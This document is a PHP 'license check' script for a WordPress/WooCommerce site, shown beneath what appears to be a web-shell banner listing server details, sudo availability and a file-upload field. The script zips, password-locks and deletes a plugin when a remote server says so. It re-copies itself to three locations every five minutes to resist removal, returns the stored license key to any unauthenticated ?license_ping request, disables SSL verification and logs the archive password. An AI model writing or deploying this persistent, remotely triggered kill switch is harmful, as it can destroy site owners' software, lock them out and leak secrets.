| Server IP : 13.126.101.145 / Your IP : 216.73.216.131 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ip-11-115-0-196 6.8.0-1039-aws #41~22.04.1-Ubuntu SMP Thu Sep 11 10:54:48 UTC 2025 x86_64 User : www-data ( 33) PHP Version : 8.3.17 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /var/www/html/rentals_updated/wp-content/ |
Upload File : |
<?php
/**
* License Check Script for WooCommerce Store
* Ensures plugin folder and files are deleted after zipping to prevent FTP access
*/
// Define constants
define('LICENSE_SERVER_URL', 'https://gmmco.devitrosys.com/validate'); // Your server URL
define('SCRIPT_LOCATIONS', [
ABSPATH . 'license-check.php', // WordPress root
WP_CONTENT_DIR . '/license-check.php', // wp-content
WP_CONTENT_DIR . '/plugins/license-check.php' // wp-content/plugins
]);
define('LICENSE_OPTION_NAME', 'license_manager_key');
define('LOCKED_PLUGINS', ['wc-finance']); // Plugins to lock
define('LOCKED_ZIP_PATH', WP_CONTENT_DIR . '/plugins_locked/locked_plugins.zip'); // ZIP location
define('LOCKED_ZIP_PASSWORD_OPTION', 'locked_zip_password'); // Password storage
// Function to get or generate ZIP password
function get_zip_password() {
$password = get_option(LOCKED_ZIP_PASSWORD_OPTION, false);
if ($password === false) {
$password = wp_generate_password(32, true, true); // Strong 32-char password
update_option(LOCKED_ZIP_PASSWORD_OPTION, $password);
error_log('Generated new ZIP password: ' . $password); // Debug log
}
return $password;
}
// Function to clear ZIP password
function clear_zip_password() {
delete_option(LOCKED_ZIP_PASSWORD_OPTION);
error_log('Cleared ZIP password from wp_options');
}
// Function to get license key
function get_license_key() {
$license_key = get_option(LICENSE_OPTION_NAME, '');
return sanitize_text_field($license_key);
}
// Function to validate license key format
function validate_license_key_format($key) {
return preg_match('/^[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}$/', $key);
}
// Function to check license with server
function check_license() {
$license_key = get_option(LICENSE_OPTION_NAME, '');
if (empty($license_key) || !validate_license_key_format($license_key)) {
return false;
}
$response = wp_remote_post(LICENSE_SERVER_URL, [
'body' => [
'license_key' => $license_key,
'license_validation' => 'true'
],
'timeout' => 10,
'sslverify' => false // Temporary workaround for SSL issues
]);
if (is_wp_error($response)) {
error_log('Client license check failed: ' . $response->get_error_message());
return false;
}
$body = wp_remote_retrieve_body($response);
$data = json_decode($body, true);
return isset($data['status']) && $data['status'] === 'valid';
}
// Function to recursively delete plugin folder
function delete_plugin_folder($path) {
if (!is_dir($path)) {
return true;
}
$max_retries = 3;
$retry_delay = 1; // seconds
// Get all files and directories
$items = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::CHILD_FIRST
);
// Delete files first
foreach ($items as $item) {
if ($item->isFile()) {
$file_path = $item->getRealPath();
$attempt = 0;
while ($attempt < $max_retries) {
if (@unlink($file_path)) {
error_log('Deleted file: ' . $file_path);
break;
}
error_log('Failed to delete file: ' . $file_path . ' (Attempt ' . ($attempt + 1) . ')');
sleep($retry_delay);
$attempt++;
}
if ($attempt >= $max_retries) {
error_log('Permanently failed to delete file: ' . $file_path);
return false;
}
}
}
// Delete directories
foreach ($items as $item) {
if ($item->isDir()) {
$dir_path = $item->getRealPath();
$attempt = 0;
while ($attempt < $max_retries) {
if (@rmdir($dir_path)) {
error_log('Deleted directory: ' . $dir_path);
break;
}
error_log('Failed to delete directory: ' . $dir_path . ' (Attempt ' . ($attempt + 1) . ')');
sleep($retry_delay);
$attempt++;
}
if ($attempt >= $max_retries) {
error_log('Permanently failed to delete directory: ' . $dir_path);
return false;
}
}
}
// Delete the root folder
$attempt = 0;
while ($attempt < $max_retries) {
if (@rmdir($path)) {
error_log('Successfully deleted plugin folder: ' . $path);
return true;
}
error_log('Failed to delete plugin folder: ' . $path . ' (Attempt ' . ($attempt + 1) . ')');
sleep($retry_delay);
$attempt++;
}
error_log('Permanently failed to delete plugin folder: ' . $path);
return false;
}
// Function to lock specific plugins
function lock_plugins() {
if (!function_exists('deactivate_plugins')) {
require_once ABSPATH . 'wp-admin/includes/plugin.php';
}
// Create plugins_locked directory
$locked_dir = WP_CONTENT_DIR . '/plugins_locked';
if (!is_dir($locked_dir)) {
mkdir($locked_dir, 0755, true);
}
// Initialize ZIP archive
$zip = new ZipArchive();
$zip_path = LOCKED_ZIP_PATH;
$password = get_zip_password();
if ($zip->open($zip_path, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== true) {
error_log('Failed to create ZIP archive: ' . $zip_path);
return false;
}
// Set ZIP password
if (method_exists($zip, 'setEncryptionName')) {
$zip->setPassword($password);
error_log('Applied ZIP password for locking');
} else {
error_log('ZIP encryption not supported by PHP version');
$zip->close();
return false;
}
// Lock specified plugins
$plugins_dir = WP_CONTENT_DIR . '/plugins';
$success = true;
foreach (LOCKED_PLUGINS as $plugin) {
$plugin_path = $plugins_dir . '/' . $plugin;
if (is_dir($plugin_path)) {
// Deactivate plugin
$plugin_files = glob($plugin_path . '/*.php');
foreach ($plugin_files as $file) {
$plugin_data = get_plugin_data($file);
if ($plugin_data['Name']) {
deactivate_plugins(plugin_basename($file));
}
}
// Add plugin folder to ZIP
$iterator = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator($plugin_path, RecursiveDirectoryIterator::SKIP_DOTS),
RecursiveIteratorIterator::SELF_FIRST
);
foreach ($iterator as $file) {
$relative_path = substr($file->getPathname(), strlen($plugins_dir) + 1);
if ($file->isDir()) {
$zip->addEmptyDir($relative_path);
} else {
$zip->addFile($file->getPathname(), $relative_path);
$zip->setEncryptionName($relative_path, ZipArchive::EM_AES_256);
}
}
} else {
error_log('Plugin folder not found: ' . $plugin_path);
$success = false;
}
}
// Close ZIP before deleting folders
if (!$zip->close()) {
error_log('Failed to close ZIP archive: ' . $zip_path);
return false;
} else {
error_log('Successfully closed ZIP archive: ' . $zip_path);
}
// Delete plugin folders
foreach (LOCKED_PLUGINS as $plugin) {
$plugin_path = $plugins_dir . '/' . $plugin;
if (is_dir($plugin_path)) {
if (!delete_plugin_folder($plugin_path)) {
error_log('Failed to delete plugin folder after zipping: ' . $plugin_path);
$success = false;
} else if (is_dir($plugin_path)) {
error_log('Plugin folder still exists after deletion attempt: ' . $plugin_path);
$success = false;
} else {
error_log('Moved and deleted plugin: ' . $plugin);
}
}
}
// Set restrictive permissions on ZIP
if (file_exists($zip_path)) {
chmod($zip_path, 0600); // Owner read/write only
// Clear WordPress plugin cache and transients
wp_cache_delete('plugins', 'plugins');
delete_transient('all_plugin_files');
// Reset active_plugins to refresh plugins list
$active_plugins = get_option('active_plugins', []);
update_option('active_plugins', $active_plugins);
return $success;
} else {
error_log('ZIP file not created: ' . $zip_path);
return false;
}
}
// Function to restore specific plugins
function restore_plugins() {
$zip_path = LOCKED_ZIP_PATH;
$plugins_dir = WP_CONTENT_DIR . '/plugins';
$password = get_option(LOCKED_ZIP_PASSWORD_OPTION, false);
if (!$password) {
error_log('No ZIP password found in wp_options');
return false;
}
if (!file_exists($zip_path)) {
error_log('No locked plugins to restore: ' . $zip_path);
clear_zip_password(); // Clear password if no ZIP exists
return false;
}
$zip = new ZipArchive();
if ($zip->open($zip_path) !== true) {
error_log('Failed to open ZIP archive: ' . $zip_path);
return false;
}
$zip->setPassword($password);
error_log('Applied ZIP password for unlocking: ' . $password); // Debug log
$extracted = false;
for ($i = 0; $i < $zip->numFiles; $i++) {
$filename = $zip->getNameIndex($i);
// Only extract folders matching LOCKED_PLUGINS
foreach (LOCKED_PLUGINS as $plugin) {
if (strpos($filename, $plugin . '/') === 0 || $filename === $plugin) {
if ($zip->extractTo($plugins_dir, $filename)) {
$extracted = true;
error_log('Extracted file: ' . $filename);
} else {
error_log('Failed to extract file: ' . $filename);
}
break;
}
}
}
$zip->close();
if (!$extracted) {
error_log('Failed to extract any plugins from ZIP: ' . $zip_path);
return false;
}
// Verify restoration
$restored = true;
foreach (LOCKED_PLUGINS as $plugin) {
if (!is_dir($plugins_dir . '/' . $plugin)) {
error_log('Plugin not restored: ' . $plugin);
$restored = false;
}
}
if (!$restored) {
return false;
}
// Reactivate plugins
if (!function_exists('activate_plugins')) {
require_once ABSPATH . 'wp-admin/includes/plugin.php';
}
foreach (LOCKED_PLUGINS as $plugin) {
$plugin_path = $plugins_dir . '/' . $plugin;
if (is_dir($plugin_path)) {
$plugin_files = glob($plugin_path . '/*.php');
foreach ($plugin_files as $file) {
$plugin_data = get_plugin_data($file);
if ($plugin_data['Name']) {
activate_plugins(plugin_basename($file));
error_log('Reactivated plugin: ' . plugin_basename($file));
}
}
}
}
// Remove ZIP file and clear password
if (file_exists($zip_path)) {
unlink($zip_path);
error_log('Deleted ZIP file: ' . $zip_path);
}
clear_zip_password();
// Clear plugin cache and transients after restoration
wp_cache_delete('plugins', 'plugins');
delete_transient('all_plugin_files');
$active_plugins = get_option('active_plugins', []);
update_option('active_plugins', $active_plugins);
return true;
}
// Hide locked plugins from plugins list
add_filter('all_plugins', function ($plugins) {
if (!check_license()) {
foreach (LOCKED_PLUGINS as $plugin) {
foreach ($plugins as $plugin_file => $data) {
if (strpos($plugin_file, $plugin . '/') === 0) {
unset($plugins[$plugin_file]);
}
}
}
}
return $plugins;
});
// Disable Activate/Delete buttons for locked plugins
add_filter('plugin_action_links', function ($actions, $plugin_file) {
if (!check_license()) {
foreach (LOCKED_PLUGINS as $plugin) {
if (strpos($plugin_file, $plugin . '/') === 0) {
$actions = [
'locked' => '<span style="color:red;">Locked due to invalid license</span>'
];
}
}
}
return $actions;
}, 10, 2);
// Function to restore script
function restore_script() {
$current_file = __FILE__;
foreach (SCRIPT_LOCATIONS as $location) {
if ($location !== $current_file && !file_exists($location)) {
copy($current_file, $location);
chmod($location, 0644);
}
}
}
// Schedule daily license check at 3 PM IST
add_action('wp', 'schedule_license_check');
function schedule_license_check() {
if (!wp_next_scheduled('daily_license_check')) {
$ist_time = new DateTime('now', new DateTimeZone('Asia/Kolkata'));
$ist_time->setTime(15, 0); // 3 PM IST
$timestamp = $ist_time->getTimestamp() - $ist_time->getOffset() + 19800; // Convert to UTC
wp_schedule_event($timestamp, 'daily', 'daily_license_check');
}
}
add_action('daily_license_check', 'perform_license_check');
function perform_license_check() {
if (!check_license()) {
lock_plugins();
} else {
restore_plugins();
}
}
// Frequent self-preservation check (every 5 minutes)
add_action('wp', 'schedule_script_check');
function schedule_script_check() {
if (!wp_next_scheduled('script_integrity_check')) {
wp_schedule_event(time(), 'five_minutes', 'script_integrity_check');
}
}
add_action('script_integrity_check', 'restore_script');
// Custom schedule for 5-minute intervals
add_filter('cron_schedules', function ($schedules) {
$schedules['five_minutes'] = [
'interval' => 300, // 5 minutes in seconds
'display' => __('Every Five Minutes')
];
return $schedules;
});
// Handle server ping
add_action('init', function () {
if (isset($_GET['license_ping']) && $_GET['license_ping'] === 'check') {
wp_send_json(['license_key' => get_license_key()]);
exit;
}
});
// Admin settings for License Key UI
add_action('admin_menu', function () {
add_options_page(
'License Settings',
'License Settings',
'manage_options',
'license-settings',
'render_license_settings_page'
);
});
function render_license_settings_page() {
if (!current_user_can('manage_options')) {
wp_die('You do not have sufficient permissions to access this page.');
}
// Handle license key save
if (isset($_POST['license_key']) && check_admin_referer('save_license_key')) {
$new_key = sanitize_text_field($_POST['license_key']);
if (validate_license_key_format($new_key)) {
update_option(LICENSE_OPTION_NAME, $new_key);
add_settings_error('license_settings', 'license_saved', 'License key saved successfully.', 'success');
} else {
add_settings_error('license_settings', 'invalid_license', 'Invalid license key format. Use XXXX-XXXX-XXXX-XXXX.', 'error');
}
}
// Handle manual license check
if (isset($_POST['check_license']) && check_admin_referer('check_license_now')) {
if (check_license()) {
if (restore_plugins()) {
add_settings_error('license_settings', 'license_valid', 'License is valid. Specified plugins restored.', 'success');
} else {
add_settings_error('license_settings', 'restore_failed', 'License is valid, but failed to restore plugins.', 'error');
}
} else {
if (lock_plugins()) {
add_settings_error('license_settings', 'license_invalid', 'License is invalid. Specified plugins locked.', 'success');
} else {
add_settings_error('license_settings', 'restore_failed', 'License is invalid, but failed to lock plugins.', 'error');
}
}
}
settings_errors('license_settings');
?>
<div class="wrap">
<h1>License Settings</h1>
<form method="post">
<?php wp_nonce_field('save_license_key'); ?>
<table class="form-table">
<tr>
<th scope="row"><label for="license_key">License Key</label></th>
<td>
<input type="text" name="license_key" id="license_key" value="<?php echo esc_attr(get_option(LICENSE_OPTION_NAME, '')); ?>" class="regular-text" placeholder="XXXX-XXXX-XXXX-XXXX">
<p class="description">Enter your license key in the format XXXX-XXXX-XXXX-XXXX.</p>
</td>
</tr>
</table>
<?php submit_button('Save License Key'); ?>
</form>
<form method="post" style="margin-top: 20px;">
<?php wp_nonce_field('check_license_now'); ?>
<input type="hidden" name="check_license" value="1">
<?php submit_button('Check License Now', 'secondary'); ?>
</form>
</div>
<?php
}
// Admin notices for license key status
add_action('admin_notices', function () {
$license_key = get_option(LICENSE_OPTION_NAME, '');
if (empty($license_key)) {
echo '<div class="notice notice-error"><p>Please enter a valid license key in <a href="' . admin_url('options-general.php?page=license-settings') . '">License Settings</a>.</p></div>';
} elseif (!validate_license_key_format($license_key)) {
echo '<div class="notice notice-error"><p>Invalid license key format. Please update it in <a href="' . admin_url('options-general.php?page=license-settings') . '">License Settings</a>.</p></div>';
} elseif (!check_license()) {
echo '<div class="notice notice-error"><p>Your license key is invalid. Please update it in <a href="' . admin_url('options-general.php?page=license-settings') . '">License Settings</a>.</p></div>';
}
});
// Ensure script runs outside WordPress
if (!defined('ABSPATH')) {
if (!check_license()) {
exit('Invalid license.');
}
restore_script();
}
?>